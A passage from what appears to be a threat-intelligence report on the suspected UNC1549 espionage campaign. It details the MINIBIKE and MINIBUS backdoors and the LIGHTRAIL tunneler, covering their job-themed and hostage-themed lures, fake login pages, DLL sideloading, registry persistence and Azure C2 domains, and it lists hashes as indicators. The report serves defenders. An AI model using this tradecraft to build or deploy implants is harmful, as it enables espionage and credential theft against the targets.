<div class="block-paragraph_advanced"><ul>
<li><strong>Payload installation and device compromise</strong>, achieved after the MINIBIKE or MINIBUS backdoors establish C2 communication, in most cases via Microsoft Azure cloud infrastructure. 
<ul>
<li>The access to the device can be leveraged for multiple purposes, including intelligence collection and as a stepping stone for further access into the targeted network.</li>
<li>This stage may be supported by the use of LIGHTRAIL, a unique tunneler used in the campaign (see the following details).</li>
</ul>
</li>
</ul>
<p>This suspected UNC1549 campaign<strong> deployed several evasion techniques to mask their activity</strong>:</p>
<ul>
<li>Abusing Microsoft Azure infrastructure for C2 and hosting, making it difficult to discern the activity from legitimate network traffic. In some cases, servers geolocated in the targeted countries (Israel and the UAE) were used, further masking the activity.</li>
<li>Using domain naming schemes that include strings that would likely seem legitimate to network defenders, like countries, organizations names, languages or descriptions related to the targeted sector. Following are several examples of indicative Azure domains: 
<ul>
<li><strong><u>il</u></strong>engineeringrssfeed[.]azurewebsites[.]net (“IL Engineering RSS Feed”)</li>
<li>hiring<strong><u>arabic</u></strong>region[.]azurewebsites[.]net (“Hiring Arabic Region”)</li>
<li><strong><u>turk</u></strong>airline[.]azurewebsites[.]net (“Turk Airline”)</li>
</ul>
</li>
<li>
<p>Using job-themed lures, offering various IT and tech-related positions, which are likely to be disseminated legitimately. One of these fake job offers is presented in Figure 5.</p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig5-fig8.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6skve">Figure 5: Fake job offer on behalf of DJI, a drone manufacturing company (MD5: 4a223bc9c6096ac6bae3e7452ed6a1cd)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Malware Families</h2>
<p>Mandiant observed the following custom malware families used in the suspected UNC1549 activity.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Malware Family</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>First Seen</strong></p>
</td>
<td>
<p><strong>Last Seen</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>MINIBIKE</span></p>
</td>
<td>
<p><span>A custom backdoor written in C++ capable of file exfiltration and upload, command execution, and more. Communicates using Azure cloud infrastructure.</span></p>
</td>
<td>
<p><span>June 2022</span></p>
</td>
<td>
<p><span>October 2023</span></p>
</td>
</tr>
<tr>
<td>
<p><span>MINIBUS</span></p>
</td>
<td>
<p><span>A custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>January 2024</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LIGHTRAIL</span></p>
</td>
<td>
<p><span>A tunneler, likely based on an open-source Socks4a proxy, that communicates using Azure cloud infrastructure</span></p>
</td>
<td>
<p><span>November 2022</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><p>MINIBIKE is a custom malware written in C++, used since at least June 2022. Once MINIBIKE is installed, it provides a full backdoor functionality, including directory and file enumeration, collection of system files and information, uploading files, and running additional processes. </p>
<p>The MINIBIKE platform usually consists of three utilities bundled in an archive, delivered via spear phishing:</p>
<ol>
<li>The MINIBIKE backdoor, usually in the form of a .dll or a .dat file</li>
<li>A launcher, executed via search-order-hijacking (SoH), deploying MINIBIKE and setting its persistence using registry keys</li>
<li>A legitimate/fake executable, used to mask the malicious MINIBIKE deployment. Mandiant observed different MINIBIKE versions use three applications for this purpose: Microsoft SharePoint, Microsoft OneDrive, and a fake Hamas-related .NET application.</li>
</ol>
<p>The MINIBIKE platform has been in use since at least June 2022, gradually being developed to several versions distinct from each other in lures, features, and functionality. While Mandiant did not observe any embedded version numbers, <strong>the</strong> <strong>MINIBIKE instances can be divided to the following versions</strong>.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Ver.</strong></p>
</td>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Changes (Compared to Earlier Version)</strong></p>
</td>
<td>
<p><strong>Geographies</strong></p>
</td>
<td>
<p><strong>Example MD5</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>1.0</span></p>
</td>
<td>
<p><span>June 2022</span></p>
</td>
<td>
<p><span>- First version</span></p>
<p><span>- C2 server geolocated in Iran (not Azure)</span></p>
<p><span>- Submitted to a public malware repository from Iran</span></p>
<p><span>- Legitimate SharePoint installation as a lure</span></p>
<p><span>- Bundled in an IMG drive (“Screenshot.img”)</span></p>
<p><span>- Export DLL name: “update.dll”</span></p>
</td>
<td>
<p><span>Iran</span></p>
</td>
<td>
<p><span>adef679c6aa6860a<br>a89b775dceb6958b</span></p>
</td>
</tr>
<tr>
<td>
<p><span>1.1</span></p>
</td>
<td>
<p><span>October–November 2022</span></p>
</td>
<td>
<p><span>- </span><strong>First use of Azure subdomains for C2</strong><span> - Three embedded, only one used</span></p>
<p><span>- First use of OneDrive installation as a lure and as a registry key for persistence</span></p>
<p><span>- Export DLL name: “Mini.dll”</span></p>
</td>
<td>
<p><span>UAE, Turkey</span></p>
</td>
<td>
<p><span>409c2ac789015e76<br>f9886f1203a73bc0</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.0</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- Three to five Azure C2 domains used subsequently in a loop</span></p>
<p><span>- </span><strong>Bundled in a ZIP file (“Survey.zip”)</strong></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Additional functionality and commands</span></p>
<p><span>- Export DLL name: “Mini-Junked.dll”</span></p>
</td>
<td>
<p><span>Israel, UAE</span></p>
</td>
<td>
<p><span>691d0143c0642ff7<br>83909f983ccb8ffd</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.1</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- Uses “Image Photo Viewer“ registry key for persistence</span></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Three Azure C2 domains</span></p>
</td>
<td>
<p><span>Israel, India</span></p>
</td>
<td>
<p><span>e3dc8810da71812b<br>860fc59aeadcc350</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.2</span></p>
</td>
<td>
<p><span>August–October 2023</span></p>
</td>
<td>
<p><span>- Four Azure C2 domains</span></p>
<p><span>- Reverts back to OneDrive registry key for persistence</span></p>
<p><span>- Additional functionality and commands</span></p>
<p><span>- Additional obfuscation</span></p>
<p><span>- Beacon communication looping over three “files”: index.html, favicon.ico, icon.svg</span></p>
<p><span>- Export DLL name: “Micro.dll”</span></p>
</td>
<td>
<p><span>Israel, UAE</span></p>
</td>
<td>
<p><span>054c67236a86d9ab<br>5ec80e16b884f733</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MINIBUS: A RoBUSt Successor?</h2>
<p>Mandiant observed a second backdoor deployed in this campaign, which bears multiple similarities to MINIBIKE and was therefore named MINIBUS. The MINIBUS platform has been used since at least August 2023, likely during the same time as the latest MINIBIKE versions, though not necessarily to target the same victims. </p>
<p><strong>MINIBUS is a more advanced, updated platform when compared to MINIBIKE</strong>. While similar in functionality and code base, <strong>MINIBUS contains fewer built-in features and a more flexible code-execution and command interface</strong> in addition to more advanced reconnaissance features. </p>
<p>This might make the MINIBUS platform a more suitable option for an experienced operator, which instead of using ready-to-use features may require a more flexible platform. Such an operator may be concerned with operational security (OpSec), possibly as an early stage in a more elaborate  operation.</p>
<p>The following is a more detailed list of the key differences between the MINIBIKE and MINIBUS platforms.</p>
<h3>Functionality</h3>
<ul>
<li>MINIBUS has fewer built-in commands and features when compared with MINIBIKE. Instead, MINIBUS provides a more flexible code-execution and command interface, including the ability to run an executable (for example, a possible next-stage implant) using a single command, unlike MINIBIKE.</li>
<li>MINIBUS has a process enumeration feature. A process list generated by MINIBUS may be useful to avoid detection, for example, by identifying processes related to Virtual Machine (VM) utilities or security applications (such as an EDR). </li>
</ul>
<h3>Export DLL Names</h3>
<p>The MINIBUS bundle contains DLLs with the names “torvaldinitial.dll” for its launcher/installer and “torvaldspersist.dll” for its payload, unlike MINIBIKE, which utilizes export DLL names like “Dr2.dll” or “MspUpdate.dll”  (for its launchers) and “Mini-Junked.dll” or “Micro.dll” (for its payloads).</p>
<h3>C2 Communication</h3>
<p>MINIBUS uses a combination of an Azure subdomain and unique *.com domains for C2 communications, unlike MINIBIKE, which relies only on Azure infrastructure.</p>
<h3>Lures and Themes</h3>
<p><strong>MINIBUS deployed lures related to the Israel-Hamas war</strong>, including a fake .NET application with themes and contents abusing the “Bring Them Home Now” movement, which calls for the return of the Israeli hostages kidnapped by Hamas. In another MINIBUS instance, Mandiant observed a lure related to Quizora, possibly referring to a quiz application.</p>
<h3>Targeting and Geography</h3>
<p>Like MINIBIKE, Mandiant observed MINIBUS targeting <strong>Israel and possibly India and the UAE</strong>. In addition, a MINIBUS C2 domain (cashcloudservices[.]com) had a subdomain with the prefix ns<u>albania</u>hack[.]*, suggesting <strong>an interest in Albania</strong> as well, which is consistent with Iran interests but not yet observed in a MINIBIKE-related activity.</p>
<h2>LIGHTRAIL: Highway to Where?</h2>
<p>In addition to the MINIBIKE and MINIBUS backdoors, Mandiant observed a tunneler named LIGHTRAIL likely affiliated with UNC1549 as well.</p>
<p>LIGHTRAIL has several connections to MINIBIKE and MINIBUS in the form of (1) a shared code base, (2) Azure C2 infrastructure with similar patterns and naming, and (3) overlapping targets and victimology.</p>
<p>LIGHTRAIL communicates with an Azure C2 subdomain of the form <em>*[.]*[.]cloudapp[.]azure[.]com</em>. Mandiant assesses with medium confidence that both LIGHTRAIL and MINIBIKE were used to target the same victim environment at least once.</p>
<p>LIGHTRAIL likely leverages the open-source utility <a href="https://github.com/codewhitesec/Lastenzug" rel="noopener" target="_blank"><u>“Lastenzug”</u></a> (“freight train” in German), a Socks4a proxy based on websockets with a “static obfuscation on [the] assembly level.” LIGHTRAIL’s export DLL is named “lastenzug.dll,” and it shares the same hard-coded User Agent as Lastenzug.</p>
<ul>
<li>Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136</li>
</ul>
<p>Mandiant observed two LIGHTRAIL versions used at least since November 2022. Similarly to MINIBIKE, no “official” versions were embedded in LIGHTRAIL’s code, but the instances can be divided to two versions.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Ver.</strong></p>
</td>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Changes (Compared to Earlier Version)</strong></p>
</td>
<td>
<p><strong>Geographies</strong></p>
</td>
<td>
<p><strong>Example MD5</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>1.0</span></p>
</td>
<td>
<p><span>November 2022</span></p>
</td>
<td>
<p><span>- C2 domains: tnlsowki[.]westus3[.]cloudapp[.]azure[.]com</span></p>
<p><span>tnlsowkis[.]westus3[.]cloudapp[.]azure[.]com</span></p>
<p><span>- Export DLL named “lastenzug.dll”, likely referring to the </span><a href="https://github.com/codewhitesec/Lastenzug" rel="noopener" target="_blank"><span>open-source</span></a><span> Socks4a proxy</span></p>
</td>
<td>
<p><span>Turkey</span></p>
</td>
<td>
<p><span>36e2d9ce19ed045a<br>9840313439d6f18d</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.0</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- C2 domain: iaidevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</span></p>
<p><span>- Export DLL named “</span><strong>L</strong><span>astenzug.dll” (capital ‘L’)</span></p>
<p><span>- String obfuscation, similar to MINIBIKE</span></p>
</td>
<td>
<p><span>Israel</span></p>
</td>
<td>
<p><span>a5fdf55c1c50be47<br>1946de937f1e46dd</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>Credential Harvesting and Fake Job Offers</h2>
<p>Mandiant observed that several websites hosting MINIBIKE payloads also hosted fake login pages in mid-2023 posing as job offers on behalf of legitimate defense and technology-related companies. More specifically, the companies were affiliated with the  aerospace, aviation, and thermal imaging industries.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig3-fig6.max-1000x1000.png" alt="Fake login page masquerading as the aerospace company Boeing">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 6: Fake login page masquerading as the aerospace company Boeing</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig7.max-1000x1000.png" alt="Fake login page masquerading as Teledyne FLIR, a manufacturer of thermal imaging devices">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 7: Fake login page masquerading as Teledyne FLIR, a manufacturer of thermal imaging devices</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>In addition, Mandiant observed suspected UNC1549 infrastructure hosting job description documents for positions in DJI,  a drone manufacturing company, in parallel to a MINIBIKE .zip file. </p>
<p>The documents were likely used as lures in social engineering efforts, either for running malicious files or harvesting credentials.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig5-fig8.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 8: Fake DJI job offer (MD5: 4a223bc9c6096ac6bae3e7452ed6a1cd)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig9.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 9: Fake DJI job offer (MD5: ec6a0434b94f51aa1df76a066aa05413)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Technical Appendix</h2>
<h3>MINIBIKE Technical Analysis</h3>
<p>Mandiant observed the following versions of MINIBIKE deployed since 2022.</p>
<h4>Version 1.x, June–November 2022</h4>
<ul>
<li><strong>Payload:</strong> IMG archive named <em>Screenshot.img</em> (example MD5: 409c2ac789015e76f9886f1203a73bc0), containing the following files:
<ul>
<li>Screenshots.lnk - a launcher LNK file (MD5: cb565b1bb128dfc20c8392974ff73e3f)</li>
<li>Setup.exe - a legitimate OneDrive/SharePoint executable (MD5: 400d7190012517677dd5ef2e471f2cd1)</li>
<li>secur32.dll - the MINIBIKE launcher, executed via search-order-hijacking (SoH) (MD5: 54848d17aa76d807e2fd6d196a01ce84)</li>
<li>configur.dll - the MINIBIKE backdoor (MD5: e9ed595b24a7eeb34ac52f57eeec6e2b)</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: Most of the following analysis refers to version 1.0, but version 1.1 behaves in a similar manner.</p>
<ul>
<li><strong>Execution:</strong> once the IMG archive is mounted, the malicious launcher is executed via SoH and copies the legitimate executable and the MINIBIKE backdoor to the following paths:
<ul>
<li><strong>Legitimate executable: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\configs\FileCoAuth.exe</li>
<li><strong>MINIBIKE backdoor: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\configs\secur32.dll</li>
</ul>
</li>
<li><strong>Persistence:</strong> The loader/installer sets persistence for the MINIBIKE payload by moving it to its staging directory and setting the following Run registry key:
<ul>
<li><strong>Key:</strong> HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDriveFileCoAuth.exe</li>
<li><strong>Value:</strong> %LOCALAPPDATA%\Microsoft\OneDrive\configs\FileCoAuth.exe</li>
</ul>
</li>
<li><strong>Export DLL name:</strong>
<ul>
<li><strong>Version 1.0:</strong><em> “update.dll”</em></li>
<li><strong>Version 1.1:</strong><em><strong> </strong>“Mini.dll”</em></li>
</ul>
</li>
<li><strong>User Agent:</strong>
<ul>
<li><strong>Version 1.0:</strong><em> Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Mobile Safari/537.36</em></li>
<li><strong>Version 1.1:</strong><em><strong> </strong>Mozilla/5.0</em></li>
</ul>
</li>
<li><strong>C2 infrastructure: </strong>
<ul>
<li><strong>Version 1.0:</strong> <em>158.255.74[.]25</em></li>
<li><strong>Version 1.1:</strong><em> homefurniture[.]azurewebsites[.]net</em></li>
</ul>
</li>
<li><strong>C2 URIs:</strong>
<ul>
<li><strong>Version 1.0:</strong>
<ul>
<li><em>/api/blogs/96752</em> - initial beacon and request command</li>
<li><em>/api/blogs/result/96752 </em>- command/request response</li>
<li><em>/api/blogs/download/</em> - download file</li>
<li><em>/api/blogs/result/file/</em> - upload file</li>
</ul>
</li>
<li><strong>Version 1.1:</strong>
<ul>
<li><em>/news/notifications/235722</em> - initial beacon and request command</li>
<li><em>/news/update/ </em>- command/request response</li>
<li><em>/news/image/</em> - download file</li>
</ul>
</li>
</ul>
</li>
<li><strong>Affected geographies:</strong> UAE, Turkey, Iran</li>
</ul>
<h4>Version 2.x, August–October 2023</h4>
<ul>
<li><strong>Payload:</strong> ZIP archive, usually named <em>Survey.zip</em> (example MD5: 691d0143c0642ff783909f983ccb8ffd), containing the following files:
<ul>
<li>Setup.exe - a legitimate executable used to sideload the installer (MD5: ce1054d542dbd999401236f2ce20f826)</li>
<li>secur32.dll - The MINIBIKE backdoor - (MD5: 1e7cf4c172bdabe48714b402d2255707)</li>
<li>lang.dat - a MINIBIKE installer (MD5: 909a235ac0349041b38d84e9aab3f3a1)</li>
</ul>
</li>
<li><strong>Execution:</strong> once the legitimate executable is run, the MINIBIKE installer is sideloaded and the files are copied to the following paths:
<ul>
<li><strong>Legitimate executable:</strong> %LOCALAPPDATA%\Microsoft\Internet Explorer\FileCoAuth.exe</li>
<li><strong>MINIBIKE backdoor: </strong>%LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll</li>
</ul>
</li>
<li><strong>Persistence:</strong> The loader/installer sets persistence for the MINIBIKE payload by moving it to its staging directory and setting the following Run registry key:
<ul>
<li><strong>Key: </strong>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive FileCoAuth</li>
<li><strong>Value:</strong> %LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: Version 2.1 uses ‘Image Photo Viewer’ as a registry key</p>
<ul>
<li><strong>Export DLL name:</strong>
<ul>
<li><strong>Versions 2.0 and 2.1:</strong> <em>“Mini-Junked.dll”</em></li>
<li><strong>Version 2.2: </strong><em>“Micro.dll”</em></li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of “devobj.dll”</p>
<ul>
<li><strong>User Agent:</strong>
<ul>
<li><em><strong>Version 2.0: </strong></em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.180 (KHTML, like Gecko) Chrome/110.0.0.2 Safari/538.36 </em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.46</em></li>
</ul>
</li>
<li><em><strong>Version 2.1: </strong></em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.46</em></li>
</ul>
</li>
<li><em><strong>Version 2.2:</strong> </em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36</em></li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of “Mozilla/5.0” user agent.</p>
<ul>
<li><strong>C2 infrastructure: </strong>This version of MINIBIKE communicates with three to five Azure subdomains. After every communication it uses the next C2 in a loop, for example:
<ul>
<li><em>blogvolleyballstatus[.]azurewebsites[.]net</em></li>
<li><em>blogvolleyballstatusapi[.]azurewebsites[.]net</em></li>
<li><em>marineblogapi[.]azurewebsites[.]net</em></li>
</ul>
</li>
<li><strong>C2 URIs: </strong>
<ul>
<li><strong>Versions 2.0 and 2.1:</strong>
<ul>
<li><em>/news/notifications/&lt;six_digits&gt;</em> - initial beacon and request command</li>
<li><em>/news/update/ </em>- command/request response</li>
<li><em>/news/image/</em> - download file</li>
</ul>
</li>
<li><strong>Version 2.2:</strong>
<ul>
<li><em>/assets/&lt;six_or_eight_digits&gt;/ {index.html / favicon.ico / icon.svg}</em> - initial beacon and request command</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/ </em>- command/request response</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/</em> - download file</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/</em> - upload file</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of URIs of the form: blogs/&lt;keywords&gt;</p>
<ul>
<li><strong>Affected geographies:</strong> Israel, UAE, and potentially India</li>
</ul>
<h3>MINIBUS Analysis</h3>
<ul>
<li><strong>Payload:</strong> ZIP archive named <em>bringthemhomenow.zip</em> (MD5: ef262f571cd429d88f629789616365e4), containing the following files:
<ul>
<li>BringThemeHome.exe - a benign executable (MD5: ce1054d542dbd999401236f2ce20f826)</li>
<li>A MINIBUS installer - secur32.dll (MD5: c5dc2c75459dc99a42400f6d8b455250)</li>
<li>CoreUIComponent.dll - the MINIBUS backdoor (MD5: 816af741c3d6be1397d306841d12e206)</li>
<li>essential.dat - an additional archive containing decoy content: a “Bring Them Home” fake .NET application created by  the threat actor (MD5: 251894b3af0ece374ed6df223ab09cab)</li>
</ul>
</li>
<li><strong>Execution:</strong> Once the legitimate executable is run, the MINIBUS installer is installed via search-order-hijacking (SoH). </li>
</ul>
<p>The installer DLL displays a message indicating the files are being extracted:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig10.max-1000x1000.png" alt="MINIBUS installer DLL installation message">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 10: MINIBUS installer DLL installation message</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>The decoy contents are moved to their intended location on the targeted system:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig11.max-1000x1000.png" alt="Installer DLL message box">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 11: Installer DLL message box</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Two main decoy files are contained within the ZIP archive along with some dependency files, essential.dat (MD5: 251894b3af0ece374ed6df223ab09cab):</p>
<ul>
<li>
<p>Decoy .NET application masquerading as an application related to Israeli hostages kidnapped by Hamas during the Oct. 7 attack on Israel: <em>&lt;extraction_directory&gt;\BringThemeHomeNow\BringThemeHomeNow.exe [sic] (MD5: dfed4468dd78ad2f5d762741df4c1755)</em></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig12.max-1000x1000.png" alt="Fake “Bring Them Home Now”.NET application “BringThemeHomeNow.exe” [sic]">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 12: Fake “Bring Them Home Now”.NET application “BringThemeHomeNow.exe” [sic]</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>Decoy image: <em>&lt;extraction_directory&gt;\BringThemeHomeNow\petition.jpg (MD5: c0060a0c26df9fed7fdcdb7d26ff921f)</em></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig4-fig13-blurred.max-1000x1000.png" alt="Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 13: Decoy content "petition.jpg"</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Upon execution, the .NET application initially checks of the existence of a flag file that indicates if the decoy has previously run on the device: <em>%LOCALAPPDATA%\Commons\lg</em></p>
<p>If the file does not exist, a splash screen is displayed prior to entering the application. If the file already exists, the application presents the main screen (seen in Figure 12).</p>
<p>In addition to displaying decoy content to the victim, the installer DLL copies the backdoor and dependency files to their staging directory, and it also sets persistence for the backdoor using the following registry run key:</p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><em><strong>Key: </strong>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveCoUpdate</em></p>
<p><em><strong>Value: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\cache\logger\FileCoAuth.exe</em></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><ul>
<li><strong>C2 infrastructure: </strong>This version of MINIBIKE communicates with one Azure subdomain and two dedicated domains:
<ul>
<li><em>vscodeupdater[.]azurewebsites[.]net</em></li>
<li><em>cashcloudservices[.]com</em></li>
<li><em>xboxplayservice[.]com</em></li>
</ul>
</li>
<li><strong>Affected geographies:</strong> Israel and India, as well as possibly UAE and Albania, based on the following subdomains of cashcloudservices[.]com:
<ul>
<li><em><strong>dubai-ae</strong>0043[.]cashcloudservices[.]com</em></li>
<li><em>ns<strong>albania</strong>hack[.]cashcloudservices[.]com</em></li>
</ul>
</li>
</ul>
<h3>Detection and Mitigation</h3>
<p>If you are a Google Chronicle Enterprise+ customer, Chronicle rules were released to your <a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><u>Emerging Threats</u></a> rule pack, and IOCs listed in this blog post are available for prioritization with <a href="https://cloud.google.com/chronicle/docs/detection">Applied Threat Intelligence</a>.  </p>
<h3>Indicators of Compromise (IOCs)</h3>
<h4>MINIBIKE</h4>
<ul>
<li>
<p>01cbaddd7a269521bf7b80f4a9a1982f</p>
</li>
<li>
<p>054c67236a86d9ab5ec80e16b884f733</p>
</li>
<li>
<p>1d8a1756b882a19d98632bc6c1f1f8cd</p>
</li>
<li>
<p>2c4cdc0e78ef57b44f11f7ec2f6164cd</p>
</li>
<li>
<p>3b658afa91ce3327dbfa1cf665529a6d</p>
</li>
<li>
<p>409c2ac789015e76f9886f1203a73bc0</p>
</li>
<li>
<p>601eb396c339a69e7d8c2a3de3b0296d</p>
</li>
<li>
<p>664cfda4ada6f8b7bb25a5f50cccf984</p>
</li>
<li>
<p>68f6810f248d032bbb65b391cdb1d5e0</p>
</li>
<li>
<p>691d0143c0642ff783909f983ccb8ffd</p>
</li>
